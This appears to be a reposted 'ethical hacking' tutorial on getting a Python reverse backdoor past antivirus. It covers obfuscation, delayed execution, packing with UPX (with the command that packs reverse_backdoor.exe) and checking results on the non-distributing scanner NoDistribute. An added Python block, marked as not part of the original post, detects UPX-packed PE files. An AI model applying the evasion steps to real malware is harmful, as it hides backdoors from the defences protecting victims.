Python Ethical Hacking - TROJANS Analysis(3)

BYPASSING ANTI-VIRUS PROGRAMS

AV programs detect viruses based on:

1. Code - compare files to huge databases of signatures.

-> Use your own code, obfuscation, useless operations, encoding, packing, etc.

2. Behaviour - run a file in a sandbox and analyze it.

-> Run trusted operations before evil code.

-> Delay execution of evil code.

Scan the file on the following website:

NoDistribute - Online Virus Scanner Without Result Distribution

https://nodistribute.com/

Use UPX to pack the executable program.

https://upx.github.io/

Download the file from https://github.com/upx/upx/releases/download/v3.95/upx-3.95-amd64_linux.tar.xz and extract it to the /opt folder.

Compress the evil file with UPX.

./upx /root/PycharmProjects/reverse_backdoor/dist/reverse_backdoor.exe -o compressed_backdoor.exe

Scan the compressed_backdoor.exe file; the result is a little better.
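From the defender's side, the UPX packing step above leaves static traces in the PE section table. The following is an added example, not code from the original post: it parses that table and flags UPX section names, sections with no bytes on disk, and high-entropy sections. The function names, the 7.2 entropy cut-off and the two sample images are assumptions constructed for illustration.

```python
import math
import struct
from collections import Counter

UPX_NAMES = {"UPX0", "UPX1", "UPX2"}  # section names left by an unmodified UPX

def entropy(data: bytes) -> float:  # Shannon entropy in bits per byte (0.0 to 8.0)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_sections(image: bytes):
    """Yield (name, virtual_size, raw_bytes) for each entry in the PE section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    # NumberOfSections and SizeOfOptionalHeader from the COFF file header
    count, opt_size = struct.unpack_from("<H12xH", image, pe_off + 6)
    table = pe_off + 24 + opt_size
    for off in range(table, table + 40 * count, 40):
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _rva, rsize, rptr = struct.unpack_from("<IIII", image, off + 8)
        yield name, vsize, image[rptr:rptr + rsize]

def packer_indicators(image: bytes, threshold: float = 7.2) -> list:
    """Reasons the image looks packed; the 7.2 cut-off is an assumed, tunable value."""
    hits = []
    for name, vsize, raw in pe_sections(image):
        if name in UPX_NAMES:
            hits.append(f"{name}: UPX section name")
        if vsize and not raw:
            hits.append(f"{name}: memory-only section (filled at run time)")
        if entropy(raw) > threshold:
            hits.append(f"{name}: entropy {entropy(raw):.2f}")
    return hits

def build_sample(sections) -> bytes:
    """Constructed input: PE headers plus section bytes only, not a runnable program."""
    head = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0"
    head += struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0)
    ptr, table, body = len(head) + 40 * len(sections), b"", b""
    for name, vsize, raw in sections:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIII", vsize, 0, len(raw), ptr + len(body)) + b"\0" * 16
        body += raw
    return head + table + body

PACKED = build_sample([("UPX0", 0x8000, b""), ("UPX1", 0x4000, bytes(range(256)) * 8)])
PLAIN = build_sample([(".text", 0x400, b"\x55\x48\x89\xe5\xc3" * 100)])
```

Legitimate software is also shipped UPX-packed, so a hit from `packer_indicators` is a triage signal rather than a verdict.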

Make your file unique and delay execution of the evil code so that the AV program thinks your program is harmless.

Original source: https://www.cnblogs.com/keepmoving1113/p/11666866.html

Time: 2024-08-01 07:33:36
